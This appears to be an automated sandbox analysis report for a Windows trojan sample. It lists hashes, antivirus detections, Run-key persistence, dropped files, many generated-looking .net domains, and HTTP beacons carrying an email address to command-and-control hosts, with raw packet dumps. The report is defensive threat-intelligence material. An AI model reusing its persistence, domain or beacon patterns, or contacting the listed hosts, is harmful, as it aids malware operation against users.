Field | Value |
---|---|
Analysis Date | 2015-08-19 08:51:27 |
MD5 | 55f9a1f3bd4b6588aeca4d4bd0066da3 |
SHA1 | 4beb2faeb107e228931427160814de8837fe6260 |
Static Details:
Property | Value |
---|---|
File type | PE32 executable for MS Windows (GUI) Intel 80386 32-bit |
Section | .text md5: 96433aeb8b7de9e599af5116e5320285 sha1: ee53c735b0c78cb802abe8802f7c815eee1be251 size: 299520 |
Section | .rdata md5: 72a9439c6ff087869accd32be38242de sha1: ab512634b7385628eec7a1b37254156c72d303a1 size: 34304 |
Section | .data md5: 5ff41039ae47da11ba6b8ce9ef79591c sha1: bda18c8b4034f7c4f2fb8365a2508bbe4317519e size: 98304 |
Timestamp | 2014-10-30 10:10:32 |
Packer | Microsoft Visual C++ ?.? |
PEhash | bf684f27c3e73973ff5dd5ac228c5391d4d6cbc4 |
IMPhash | 69e8bc9396189de1eb5059fccc3bf34d |

Scan | Engine | Verdict |
---|---|---|
AV | CA (E-Trust Ino) | Heur/Downloader.ZALU!suspicious |
AV | F-Secure | Gen:Variant.Symmi.22722 |
AV | Dr. Web | Trojan.DownLoader15.32945 |
AV | ClamAV | no_virus |
AV | Arcabit (arcavir) | Gen:Variant.Symmi.22722 |
AV | BullGuard | Gen:Variant.Symmi.22722 |
AV | Padvish | no_virus |
AV | VirusBlokAda (vba32) | no_virus |
AV | CAT (quickheal) | Trojan.Dynamer.AC3 |
AV | Trend Micro | TROJ_FORUCON.BMC |
AV | Kaspersky | Trojan.Win32.Generic |
AV | Zillya! | no_virus |
AV | Emsisoft | Gen:Variant.Symmi.22722 |
AV | Ikarus | Trojan.FBAccountLock |
AV | Frisk (f-prot) | no_virus |
AV | Authentium | W32/Wonton.B.gen!Eldorado |
AV | MalwareBytes | Trojan.Zbot.WHE |
AV | MicroWorld (escan) | Gen:Variant.Symmi.22722 |
AV | Microsoft Security Essentials | TrojanSpy:Win32/Nivdort.BD |
AV | K7 | Trojan ( 004cb2771 ) |
AV | BitDefender | Gen:Variant.Symmi.22722 |
AV | Fortinet | W32/Agent.VNC!tr |
AV | Symantec | Downloader.Upatre!g15 |
AV | Grisoft (avg) | Win32/Cryptor |
AV | Eset (nod32) | Win32/Agent.VNC |
AV | Alwil (avast) | Downloader-TLD [Trj] |
AV | Ad-Aware | Gen:Variant.Symmi.22722 |
AV | Twister | no_virus |
AV | Avira (antivir) | BDS/Zegost.Gen4 |
AV | Mcafee | Trojan-FEMT!55F9A1F3BD4B |
AV | Rising | 0x58ef8c3a |
Runtime Details:
Process
↳ C:\malware.exe
Event | Detail |
---|---|
Registry | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Function Ordering Video Software ➝ C:\Documents and Settings\Administrator\Application Data\qeerarcddwnr\olwprialx.exe |
Creates File | C:\Documents and Settings\Administrator\Application Data\qeerarcddwnr\olwprialx.exe |
Creates Process | C:\Documents and Settings\Administrator\Application Data\qeerarcddwnr\olwprialx.exe |
Process
↳ C:\Documents and Settings\Administrator\Application Data\qeerarcddwnr\olwprialx.exe
Event | Detail |
---|---|
Creates File | C:\Documents and Settings\Administrator\Application Data\qeerarcddwnr\olwprialx.vogp |
Creates File | \Device\Afd\Endpoint |
Creates File | C:\Documents and Settings\Administrator\Application Data\qeerarcddwnr\xicogfhng.exe |
Creates Process | WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\qeerarcddwnr\olwprialx.exe" |
Process
↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\qeerarcddwnr\olwprialx.exe"
Network Details:
Event | Detail |
---|---|
DNS | simpleoffice.net Type: A 50.63.202.104 |
DNS | mountainsupply.net Type: A 67.18.199.2 |
DNS | windowsupply.net Type: A 173.236.172.44 |
DNS | sweetoffice.net Type: A 162.213.251.173 |
DNS | materialsupply.net Type: A 184.168.221.36 |
DNS | laughstrong.net Type: A 50.21.189.209 |
DNS | severaoffice.net Type: A |
DNS | laughoffice.net Type: A |
DNS | severaarrive.net Type: A |
DNS | laugharrive.net Type: A |
DNS | simplesupply.net Type: A |
DNS | mothersupply.net Type: A |
DNS | simpledistance.net Type: A |
DNS | motherdistance.net Type: A |
DNS | motheroffice.net Type: A |
DNS | simplearrive.net Type: A |
DNS | motherarrive.net Type: A |
DNS | possiblesupply.net Type: A |
DNS | mountaindistance.net Type: A |
DNS | possibledistance.net Type: A |
DNS | mountainoffice.net Type: A |
DNS | possibleoffice.net Type: A |
DNS | mountainarrive.net Type: A |
DNS | possiblearrive.net Type: A |
DNS | perhapssupply.net Type: A |
DNS | perhapsdistance.net Type: A |
DNS | windowdistance.net Type: A |
DNS | perhapsoffice.net Type: A |
DNS | windowoffice.net Type: A |
DNS | perhapsarrive.net Type: A |
DNS | windowarrive.net Type: A |
DNS | wintersupply.net Type: A |
DNS | subjectsupply.net Type: A |
DNS | winterdistance.net Type: A |
DNS | subjectdistance.net Type: A |
DNS | winteroffice.net Type: A |
DNS | subjectoffice.net Type: A |
DNS | winterarrive.net Type: A |
DNS | subjectarrive.net Type: A |
DNS | finishsupply.net Type: A |
DNS | leavesupply.net Type: A |
DNS | finishdistance.net Type: A |
DNS | leavedistance.net Type: A |
DNS | finishoffice.net Type: A |
DNS | leaveoffice.net Type: A |
DNS | finisharrive.net Type: A |
DNS | leavearrive.net Type: A |
DNS | sweetsupply.net Type: A |
DNS | probablysupply.net Type: A |
DNS | sweetdistance.net Type: A |
DNS | probablydistance.net Type: A |
DNS | probablyoffice.net Type: A |
DNS | sweetarrive.net Type: A |
DNS | probablyarrive.net Type: A |
DNS | severalsupply.net Type: A |
DNS | severaldistance.net Type: A |
DNS | materialdistance.net Type: A |
DNS | severaloffice.net Type: A |
DNS | materialoffice.net Type: A |
DNS | severalarrive.net Type: A |
DNS | materialarrive.net Type: A |
DNS | severastrong.net Type: A |
DNS | severatrouble.net Type: A |
DNS | laughtrouble.net Type: A |
DNS | severapresident.net Type: A |
DNS | laughpresident.net Type: A |
DNS | severacaught.net Type: A |
DNS | laughcaught.net Type: A |
DNS | simplestrong.net Type: A |
DNS | motherstrong.net Type: A |
DNS | simpletrouble.net Type: A |
DNS | mothertrouble.net Type: A |
DNS | simplepresident.net Type: A |
DNS | motherpresident.net Type: A |
DNS | simplecaught.net Type: A |
DNS | mothercaught.net Type: A |
DNS | mountainstrong.net Type: A |
DNS | possiblestrong.net Type: A |
DNS | mountaintrouble.net Type: A |
DNS | possibletrouble.net Type: A |
DNS | mountainpresident.net Type: A |
DNS | possiblepresident.net Type: A |
DNS | mountaincaught.net Type: A |
DNS | possiblecaught.net Type: A |
DNS | perhapsstrong.net Type: A |
HTTP GET | http://simpleoffice.net/index.php?email=amalia_rido@yahoo.com&method=post&len User-Agent: |
HTTP GET | http://mountainsupply.net/index.php?email=amalia_rido@yahoo.com&method=post&len User-Agent: |
HTTP GET | http://windowsupply.net/index.php?email=amalia_rido@yahoo.com&method=post&len User-Agent: |
HTTP GET | http://sweetoffice.net/index.php?email=amalia_rido@yahoo.com&method=post&len User-Agent: |
HTTP GET | http://materialsupply.net/index.php?email=amalia_rido@yahoo.com&method=post&len User-Agent: |
HTTP GET | http://laughstrong.net/index.php?email=amalia_rido@yahoo.com&method=post&len User-Agent: |
Flows TCP | 192.168.1.1:1031 ➝ 50.63.202.104:80 |
Flows TCP | 192.168.1.1:1032 ➝ 67.18.199.2:80 |
Flows TCP | 192.168.1.1:1033 ➝ 173.236.172.44:80 |
Flows TCP | 192.168.1.1:1034 ➝ 162.213.251.173:80 |
Flows TCP | 192.168.1.1:1035 ➝ 184.168.221.36:80 |
Flows TCP | 192.168.1.1:1036 ➝ 50.21.189.209:80 |
Raw Pcap
```
0x00000000 (00000) 47455420 2f696e64 65782e70 68703f65 GET /index.php?e
0x00000010 (00016) 6d61696c 3d616d61 6c69615f 7269646f mail=amalia_rido
0x00000020 (00032) 40796168 6f6f2e63 6f6d266d 6574686f @yahoo.com&metho
0x00000030 (00048) 643d706f 7374266c 656e2048 5454502f d=post&len HTTP/
0x00000040 (00064) 312e300d 0a416363 6570743a 202a2f2a 1.0..Accept: */*
0x00000050 (00080) 0d0a436f 6e6e6563 74696f6e 3a20636c ..Connection: cl
0x00000060 (00096) 6f73650d 0a486f73 743a2073 696d706c ose..Host: simpl
0x00000070 (00112) 656f6666 6963652e 6e65740d 0a0d0a   eoffice.net....

0x00000000 (00000) 47455420 2f696e64 65782e70 68703f65 GET /index.php?e
0x00000010 (00016) 6d61696c 3d616d61 6c69615f 7269646f mail=amalia_rido
0x00000020 (00032) 40796168 6f6f2e63 6f6d266d 6574686f @yahoo.com&metho
0x00000030 (00048) 643d706f 7374266c 656e2048 5454502f d=post&len HTTP/
0x00000040 (00064) 312e300d 0a416363 6570743a 202a2f2a 1.0..Accept: */*
0x00000050 (00080) 0d0a436f 6e6e6563 74696f6e 3a20636c ..Connection: cl
0x00000060 (00096) 6f73650d 0a486f73 743a206d 6f756e74 ose..Host: mount
0x00000070 (00112) 61696e73 7570706c 792e6e65 740d0a0d ainsupply.net...
0x00000080 (00128) 0a                                  .

0x00000000 (00000) 47455420 2f696e64 65782e70 68703f65 GET /index.php?e
0x00000010 (00016) 6d61696c 3d616d61 6c69615f 7269646f mail=amalia_rido
0x00000020 (00032) 40796168 6f6f2e63 6f6d266d 6574686f @yahoo.com&metho
0x00000030 (00048) 643d706f 7374266c 656e2048 5454502f d=post&len HTTP/
0x00000040 (00064) 312e300d 0a416363 6570743a 202a2f2a 1.0..Accept: */*
0x00000050 (00080) 0d0a436f 6e6e6563 74696f6e 3a20636c ..Connection: cl
0x00000060 (00096) 6f73650d 0a486f73 743a2077 696e646f ose..Host: windo
0x00000070 (00112) 77737570 706c792e 6e65740d 0a0d0a0d wsupply.net.....
0x00000080 (00128) 0a                                  .

0x00000000 (00000) 47455420 2f696e64 65782e70 68703f65 GET /index.php?e
0x00000010 (00016) 6d61696c 3d616d61 6c69615f 7269646f mail=amalia_rido
0x00000020 (00032) 40796168 6f6f2e63 6f6d266d 6574686f @yahoo.com&metho
0x00000030 (00048) 643d706f 7374266c 656e2048 5454502f d=post&len HTTP/
0x00000040 (00064) 312e300d 0a416363 6570743a 202a2f2a 1.0..Accept: */*
0x00000050 (00080) 0d0a436f 6e6e6563 74696f6e 3a20636c ..Connection: cl
0x00000060 (00096) 6f73650d 0a486f73 743a2073 77656574 ose..Host: sweet
0x00000070 (00112) 6f666669 63652e6e 65740d0a 0d0a0a0d office.net......
0x00000080 (00128) 0a                                  .

0x00000000 (00000) 47455420 2f696e64 65782e70 68703f65 GET /index.php?e
0x00000010 (00016) 6d61696c 3d616d61 6c69615f 7269646f mail=amalia_rido
0x00000020 (00032) 40796168 6f6f2e63 6f6d266d 6574686f @yahoo.com&metho
0x00000030 (00048) 643d706f 7374266c 656e2048 5454502f d=post&len HTTP/
0x00000040 (00064) 312e300d 0a416363 6570743a 202a2f2a 1.0..Accept: */*
0x00000050 (00080) 0d0a436f 6e6e6563 74696f6e 3a20636c ..Connection: cl
0x00000060 (00096) 6f73650d 0a486f73 743a206d 61746572 ose..Host: mater
0x00000070 (00112) 69616c73 7570706c 792e6e65 740d0a0d ialsupply.net...
0x00000080 (00128) 0a                                  .

0x00000000 (00000) 47455420 2f696e64 65782e70 68703f65 GET /index.php?e
0x00000010 (00016) 6d61696c 3d616d61 6c69615f 7269646f mail=amalia_rido
0x00000020 (00032) 40796168 6f6f2e63 6f6d266d 6574686f @yahoo.com&metho
0x00000030 (00048) 643d706f 7374266c 656e2048 5454502f d=post&len HTTP/
0x00000040 (00064) 312e300d 0a416363 6570743a 202a2f2a 1.0..Accept: */*
0x00000050 (00080) 0d0a436f 6e6e6563 74696f6e 3a20636c ..Connection: cl
0x00000060 (00096) 6f73650d 0a486f73 743a206c 61756768 ose..Host: laugh
0x00000070 (00112) 7374726f 6e672e6e 65740d0a 0d0a0a0d strong.net......
0x00000080 (00128) 0a                                  .
```
Strings